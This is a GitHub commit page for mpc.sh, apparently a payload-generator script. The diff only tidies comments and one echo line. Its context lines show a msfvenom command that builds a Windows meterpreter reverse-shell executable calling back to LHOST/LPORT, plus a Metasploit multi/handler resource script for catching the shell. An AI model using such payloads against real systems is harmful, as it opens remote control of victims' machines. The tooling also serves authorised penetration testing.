Skip to content

Commit

Permalink
MPC: Misc fix - easier to read comments
Browse files Browse the repository at this point in the history
  • Loading branch information
g0tmi1k committed Jun 22, 2015
1 parent c3efff6 commit 5f86777
Showing 1 changed file with 3 additions and 1 deletion.
4 changes: 3 additions & 1 deletion mpc.sh
Original file line number Diff line number Diff line change
Expand Up @@ -66,7 +66,9 @@ function doAction {
#echo -e " ${YELLOW}[i]${RESET} SHA1: $(sha1sum ${FILENAME} | awk '{print $1}')"

cat <<EOF > "${FILEHANDLE}"
#
# RUN: service postgresql start; service metasploit start; msfconsole -q -r "${FILENAME}"
#
setg TimestampOutput true
setg VERBOSE true
use exploit/multi/handler
Expand Down Expand Up @@ -149,7 +151,7 @@ elif [[ "${TYPE}" == "windows" ]] || [[ "${TYPE}" == "win" ]] || [[ "${TYPE}" ==
CMD="msfvenom --payload ${PAYLOAD} --format exe --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}"
doAction "Windows" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}"
elif [[ -z "${TYPE}" ]]; then
echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET} "
echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}"
else
echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}"
fi
Expand Down

0 comments on commit 5f86777

Please sign in to comment.